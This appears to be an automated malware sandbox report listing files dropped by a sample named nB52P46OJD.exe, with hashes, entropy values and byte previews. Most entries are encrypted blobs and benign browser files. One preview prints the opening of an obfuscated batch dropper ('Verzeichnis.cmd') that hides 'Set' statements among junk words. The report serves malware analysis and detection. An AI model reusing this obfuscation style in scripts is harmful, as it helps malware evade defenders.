                                                                                                                                                                                                                                                                Preview:.]y.=b..l.\1.H.......]/.s.b.bB...^..... ..3..(WK.^/p.U.C.....@.+.j.L..7k..%.._ ..;.X.1Y."...-......W...*K..A..0.i.-.Faq.wc....}.w..e-.J..S.Jio"...P.i`..(...gp......,....6n..g.......[......MZ....I....@$&......b..w[^_.J..1.~.-+x..M.Ph+..R..O..MK>...a%.._$-....D.\9.0....}F0?I.)...K....G..&.P*r...9x1......{.'.._A.}...xB%$;.}....u.a.G.,..t{J.I.'.^..........A..}x..p.....L.X..d.i..*.~.(1.NE./W...$0..6{.9....v}...V..s..}.].e..e#J=..?..8...Cr..LI....S.A...h?q..oVS[..CU.'.6.v..6....g. G(M5p....nh..J...NK..[W.I..|..V..q..}x.A..)p.....M..*.'.&uN....K...{...-;K\r.....w.U\MnE0..2%.......g...i.%5;R..`5.....!..F.....S....0...!Q.y..w.#.1..^...Ue..c-N$#v.....8..sz....r..P..aw+..f.9...B..u.....aF...dA.....F..s'I...b4.2.....H{L].....sN..x.(.$kR9.~...Y....`p`.*..%.e.?....|.6....{.kE...g".b..J..i4%f2v`A).....&p......./M.H.d`u.S....~7.........o\4o.u#..[jz...R.ve.X.g.B..z.?.5.g.5.t.B..ow).....oc.....0<.J.j|..Tg,.....y..c+..>1...i...<...f.S.BG .U.w.......TL..75...

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Saddam

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):94208
                                                                                                                                                                                                                                                                Entropy (8bit):7.998241155825975
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:1536:vAT5m+pNiZWn3HCUJsRhcSkwZrEouRLYngwtR2i7UIZjnfZzZIAe6H5f1+oa:vAdXpIZW3HARhcSrELYXtR2i7RVBSX+a
                                                                                                                                                                                                                                                                MD5:6E2264444F4EBFF4D68A451391683F27
                                                                                                                                                                                                                                                                SHA1:FE994645CBBEB2B626FA869A1BB81736C0873AE9
                                                                                                                                                                                                                                                                SHA-256:143AB2329CFA5252F0849F2C88380B2214E7C719D7901A3702F41C257A66583E
                                                                                                                                                                                                                                                                SHA-512:23DA9B93A5FD4BD2BB4C73D748D99F3D07ED76D735FD7EBF7736347EA048F1204C36A540E646C6D8A756DF656BC2F1985D5DBD42A9437E66478BBD0098870673
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.H.....m4...=.../.;.1..!..p[..E.!..2.[.V...ma.VF;:.d..7.7.rZ.y.{....m.7..G. .E4>*.......`O.'..m..o.aT.*..0S....z4/..!..1..'.y.o......QU...3.J .2...t.U..0..GI..o.k..WY..5~.`_F.2X..."mC...S..NPaD..j.rB....}.....Xa.....F.P......HX..[H=i..:......a..j.,B.(,.{.zix..l.$yg1....."....W../..Ai.......7....P. z1.M..d... ~.=.g8.}....'c..".@........[2@..4X..s.QR.W..&/.5.!.....3^D&...U....-M...5A......%...P.TS..j+......4$.....d^...Fx~}..6.].....|O.Ae....<z.k.6....;k.X...n.Hjy....v.G...I..\.&.?...A...dm........'.$....@!.).....P...*..:...6U.......D.e.....w..C.q.._.d........_..daY4i.g..yb.[...!7.o.!......7..a..C..L....TI.o..h..'.E.@...p...J...m.U.}k...O.*....H...V.|.%.5..<...fS.B.'sr....<Z...j.YXpF...P.A.,.:qFo...*.?.....C..D..~:...t!Od.iI.....=....0.bTl.>O...@..sf3...rP$[b...j....D-O.u....N........S......\?}.s...9..L.]P....Y...x.).&\bX....E...._%..................}....:..........3.?..-?...%3)..-iM...O..Q1_.. ......=..H.0..kk../TU...n.5.o.......c@...hU......

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Verzeichnis

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1400), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):30197
                                                                                                                                                                                                                                                                Entropy (8bit):5.098081137116911
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:iWOkz6QQTyu8MCySaOcS6Y0tdbKiOiQwuIaSN9vH3:iK2jyu5N7Oco0tdbKiOiQwuIaSvv3
                                                                                                                                                                                                                                                                MD5:375387BEBE09983016B9851446A4AE0C
                                                                                                                                                                                                                                                                SHA1:B7D4CEBB37D8E2C572AB09FCC90EC3B9612CD51C
                                                                                                                                                                                                                                                                SHA-256:F8F952D3BFA71EE9259E5EEAC96B7EF6993B99160BAE31174A3048AFEF58372A
                                                                                                                                                                                                                                                                SHA-512:89A7095DC8F2C24F00D7DDF25AD280B281EDC21A5D8A9CBC2EDD93DF3551FFD9BF4EAF1A53607B3E2D2DB9DE4197C00220BFE576848BBB5F559FD1CB55907127
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Set Suck=Z..BabwReturning-Frames-Urls-Paradise-Councils-..ClAbandoned-Uploaded-Bibliographic-Checking-Expressed-..vtRegardless-Producer-Abandoned-Navigation-..ucogMention-Spas-Kw-Pix-Format-Timer-..YPVs-To-..NaDStuck-Incomplete-Avg-Hoped-Grants-..WKsCleaning-Pissing-Slovakia-Cycling-Announced-..Set Ted=D..ZLZUltimately-Worthy-Southeast-..zPpMade-Confident-Credit-Repository-Stockholm-Thy-Minolta-Lifetime-Achieving-..muValentine-Ash-Survivors-..vKSanta-Holy-Announcements-Seminars-Severe-Contain-Brought-Clicks-News-..kMEncoding-Unauthorized-Accommodations-Packaging-Highlighted-..KDLegs-Silence-Dell-Tagged-Bank-Working-Um-..Set Email=h..fZyOSymphony-Detailed-Origins-..HebWallpapers-Tel-Ceo-..LUCrossing-Harold-Jobs-Chart-Sudden-Jenny-..vzHFFreebsd-Nike-Erik-Particles-Fbi-Liz-Nickname-Royal-..BaWinston-Solved-Var-Expired-..HJcSunday-Rentals-Tex-Latex-Volkswagen-Traveler-Sorts-Acrylic-Simpson-..PeBasename-Queens-..jQHCampaign-Homepage-..Set Recommendation=H..oTxMetals-Boy-Mortgages-Forbidden-

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Verzeichnis.cmd

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1400), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):30197
                                                                                                                                                                                                                                                                Entropy (8bit):5.098081137116911
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:iWOkz6QQTyu8MCySaOcS6Y0tdbKiOiQwuIaSN9vH3:iK2jyu5N7Oco0tdbKiOiQwuIaSvv3
                                                                                                                                                                                                                                                                MD5:375387BEBE09983016B9851446A4AE0C
                                                                                                                                                                                                                                                                SHA1:B7D4CEBB37D8E2C572AB09FCC90EC3B9612CD51C
                                                                                                                                                                                                                                                                SHA-256:F8F952D3BFA71EE9259E5EEAC96B7EF6993B99160BAE31174A3048AFEF58372A
                                                                                                                                                                                                                                                                SHA-512:89A7095DC8F2C24F00D7DDF25AD280B281EDC21A5D8A9CBC2EDD93DF3551FFD9BF4EAF1A53607B3E2D2DB9DE4197C00220BFE576848BBB5F559FD1CB55907127
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Set Suck=Z..BabwReturning-Frames-Urls-Paradise-Councils-..ClAbandoned-Uploaded-Bibliographic-Checking-Expressed-..vtRegardless-Producer-Abandoned-Navigation-..ucogMention-Spas-Kw-Pix-Format-Timer-..YPVs-To-..NaDStuck-Incomplete-Avg-Hoped-Grants-..WKsCleaning-Pissing-Slovakia-Cycling-Announced-..Set Ted=D..ZLZUltimately-Worthy-Southeast-..zPpMade-Confident-Credit-Repository-Stockholm-Thy-Minolta-Lifetime-Achieving-..muValentine-Ash-Survivors-..vKSanta-Holy-Announcements-Seminars-Severe-Contain-Brought-Clicks-News-..kMEncoding-Unauthorized-Accommodations-Packaging-Highlighted-..KDLegs-Silence-Dell-Tagged-Bank-Working-Um-..Set Email=h..fZyOSymphony-Detailed-Origins-..HebWallpapers-Tel-Ceo-..LUCrossing-Harold-Jobs-Chart-Sudden-Jenny-..vzHFFreebsd-Nike-Erik-Particles-Fbi-Liz-Nickname-Royal-..BaWinston-Solved-Var-Expired-..HJcSunday-Rentals-Tex-Latex-Volkswagen-Traveler-Sorts-Acrylic-Simpson-..PeBasename-Queens-..jQHCampaign-Homepage-..Set Recommendation=H..oTxMetals-Boy-Mortgages-Forbidden-

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Warm

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\nB52P46OJD.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):54352
                                                                                                                                                                                                                                                                Entropy (8bit):7.9971503948340485
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:768:MLQOmJAKbDl5ByxLyIh7tQ65pMPE1VOldVX4qZmgVh8NHaDtdK/ePyhiq467oN:+mVl54hR5Wc1VOlzX4ngDlnqxhS678
                                                                                                                                                                                                                                                                MD5:AC33880D844C5B1A1F52861EF2C6C559
                                                                                                                                                                                                                                                                SHA1:3FC04278639E1EA4D92B3610101116A3B989D023
                                                                                                                                                                                                                                                                SHA-256:18A39265B0DBC8C7A21EAE19C2013AC23E09ED9B7D2DF966FE260BFB0B909C20
                                                                                                                                                                                                                                                                SHA-512:B1223AFB6270DA049DE253561B6F93B1DA60BF9F961ED6AE8EC3775B2C4FA732F603A817855E240013C088C129EE5CC03A8271C5963DC8E79FB804254F7D7124
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:}U]3F^$E...Ja9..(...dj...........R.J7.(i.d.....-......q.QMS.H..a.f.wI.|op0...O.......$y.@:.O.i6.pb.P..cG.r7!.76!..4u+m....m...z..5P..k%...N.$s.ER.."...SKJ....%......H......a......<*G......5....z....7J.....A6V].......9..r.......zqyK......`....y(..W....`\....6.G...T.3.|."/.\.2..naBK.PLw...g..Q.FY{7..s.2.yP'JGH....p.~..'mA....|..f.y....-.}$z..B..].'...x........,.i.FZD......1.&>.L..CC~_..#.M...-...S.J..$v.6..F.X.6..Y].n.~.5........."N.V.0......2.YD.~......ts..K..$..,._..x.d.p..x..U..r+.w."..s.[_&.3t}..7....e@.J.'a8...O..hB*.E....9Sx...w.........X.........1%(7.L.......>?j..F....jB/...M.#G(.....R......e.T(..A..w....lg..W.d.a^.?.........y8.!{d._..p.;...Qv..)..H.........k)...H.T.6.T.....&(...t...b~5....E..TvW....*..g.[...4.t.l.X.h..Pe....6@....Q...@.:vp..C......h!..j..KwUtQ).......T......{&e(r...s...JB....#}d.....SB..........l..S.n...n{..V4.{..V.p......g....(....Z.A_7 e.....\..v;^....X>.!4b0rO.+5...B...._.3.[.)...L..*._.<...q...K.p.7..J.[u..w..&..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b2f18165-5b79-465e-bacd-554b1993c027.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60895
                                                                                                                                                                                                                                                                Entropy (8bit):7.939696345300614
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:4HGkkLn9yZiHv+h/QZbstN6LAk2AuzOp9Ckrz/M7t9xdLoLuGs:4HtK9zv+h/g10k2A4OXz/M7t9Poi
                                                                                                                                                                                                                                                                MD5:EFFE8565389577DD1334F05084888A9C
                                                                                                                                                                                                                                                                SHA1:AB4236187C2858929688E72679E80305BB59893D
                                                                                                                                                                                                                                                                SHA-256:57A826B38417F9CD6F186E283B9C63798CC7C12CD3B84F00EF038378B332E800
                                                                                                                                                                                                                                                                SHA-512:B0C7D9D9D868B7F1444A45C01B391186AC60DBA2937B89673FA1C9BF6D6EDB83E7F08E21B2689E8796C73F4B6E819F1205982B4DE06B406A2AA6F00CFA67C78A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ca837c69-6ea0-4406-893b-54c72c597997.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1420
                                                                                                                                                                                                                                                                Entropy (8bit):5.399595499944615
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa0rZ5HjdF0g30o5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa0rg
                                                                                                                                                                                                                                                                MD5:5F744ABB8D0E4C91046C967D16E184A9
                                                                                                                                                                                                                                                                SHA1:1AB2796E73C508680AEBF88789683300808A9FE8
                                                                                                                                                                                                                                                                SHA-256:43DD721D684D2AE7EBAD78EA708B9F6BCA398DCDC0D6397098649B372B0300C6
                                                                                                                                                                                                                                                                SHA-512:6EFB3C373D7E4A06B650243BD06611C19D06345B8C60B55F568350BD3ED734E1FCB2288A6E8A5D8F36ECA2A2278AA73D30FB5C2193F8C3C988B5B59AD2EEF480
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"logTime": "1005/081724", "correlationVector":"2/PmMr7SOFFRIqTwW+HesJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"mBsci4p0IuAlecFQAh3IDU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"EFCCE5F7ECC74238A0D17C500D8EB81C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083130", "correlationVector":"jkXXrPbML/1ucIa5c7okZ6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083130", "correlationVector":"CECEB17551BE48CCBF3DD12E07118D84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083241", "correlationVector":"WUtA7xoJfeUJPFSRRtPAng","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083242", "correlationVector":"B7F67C44DD3147F7BE748158D3F8E7B5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083444", "correlationVector":"6kKZpL8SvSsrBcj/Fl+tva","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083445", "correlationVector":"94D95442

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\e0ba0683-5b89-4e1e-a1ae-8c0f2077f5de.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31335
                                                                                                                                                                                                                                                                Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\f0b52654-90bc-46a6-9613-777151c62a35.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
